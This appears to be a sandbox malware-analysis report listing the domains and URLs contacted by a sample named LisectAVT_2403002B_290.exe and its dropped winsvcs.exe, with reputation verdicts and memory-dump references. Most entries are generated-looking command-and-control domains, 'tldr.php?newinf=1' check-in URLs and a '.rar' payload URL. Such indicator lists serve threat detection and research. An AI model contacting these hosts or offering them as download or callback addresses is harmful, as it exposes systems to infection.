                                                                          slpsrgpsrhojifdij.in
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            nousiieiffgogogoo.biz
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              nousiieiffgogogoo.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                iuirshriuisruruuf.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  aiiaiafrzrueuedur.biz
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    fiiauediehduefuge.su
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      afeifieuuufufufuf.ru
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        eofihsishihiursgu.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          srndndubsbsifurfd.in
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            eoroooskfogihisrg.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              eoroooskfogihisrg.ru
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                eiifngjfksisiufjf.su
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  eoroooskfogihisrg.net
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    aiiaiafrzrueuedur.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      nnososoosjfeuhueu.net
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        ww88.ssofhoseuegsgrfnu.ru
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          fuaiuebndieufeufu.su
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            nnososoosjfeuhueu.su
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              fiiauediehduefuge.biz
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                fiiauediehduefuge.net
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  eofihsishihiursgu.ru
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    eofihsishihiursgu.biz
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      eoroooskfogihisrg.biz
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        fifiehsueuufidhfi.in
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          fiiauediehduefuge.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            eoroooskfogihisrg.su
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              slpsrgpsrhojifdij.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                iuirshriuisruruuf.net
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  fuaiuebndieufeufu.ru
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    aiiaiafrzrueuedur.su
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      nnososoosjfeuhueu.ru
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        nousiieiffgogogoo.in
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          eofihsishihiursgu.su
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            eiifngjfksisiufjf.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              iuirshriuisruruuf.ru
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                slpsrgpsrhojifdij.su
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  fiiauediehduefuge.in
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    fifiehsueuufidhfi.ru
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      noeuaoenriusfiruu.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        eiifngjfksisiufjf.net
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          afeifieuuufufufuf.biz
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            ssofhoseuegsgrfnj.net
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              afeifieuuufufufuf.net
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                srndndubsbsifurfd.su
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  srndndubsbsifurfd.net
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    noeuaoenriusfiruu.ru
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      fuaiuebndieufeufu.in
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        nnososoosjfeuhueu.in
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          nousiieiffgogogoo.ru
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            iuirshriuisruruuf.su
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              noeuaoenriusfiruu.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                fifiehsueuufidhfi.su
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  fifiehsueuufidhfi.net
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    afeifieuuufufufuf.in
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      srndndubsbsifurfd.biz
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        eoroooskfogihisrg.in
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          noeuaoenriusfiruu.in
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            ssofhoseuegsgrfnj.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              srndndubsbsifurfd.ru
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                http://ddos.dnsnb8.net:799/cj//k3.rartrue
                                                                                                                                                                                                • URL Reputation: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=1false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                http://srndndubsbsifurfd.biz/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://eofihsishihiursgu.su/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://afeifieuuufufufuf.net/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://fiiauediehduefuge.ru/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://nnososoosjfeuhueu.su/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1Owinsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.activestate.comHolgerSciTE.exe.1.drfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://eiifngjfksisiufjf.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://eoroooskfogihisrg.in/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedurLisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://nousiieiffgogogoo.com/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://afeifieuuufufufuf.su/tldr.php?newinf=1fowinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://nnososoosjfeuhueu.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://nnososoosjfeuhueu.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://eoroooskfogihisrg.su/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://eoroooskfogihisrg.biz/tldr.php?newinf=1Kwinsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://eiifngjfksisiufjf.com/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://eoroooskfogihisrg.su/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://fifiehsueuufidhfi.net/tldr.php?newinf=1Pwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://fuaiuebndieufeufu.com/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://aiiaiafrzrueuedur.info/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://eoroooskfogihisrg.biz/tldr.php?newinf=1Twinsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://srndndubsbsifurfd.ru/tldr.php?newinf=1winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://srndndubsbsifurfd.in/tldr.php?newinf=19hwinsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://aiiaiafrzrueuedur.net/LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                    unknown
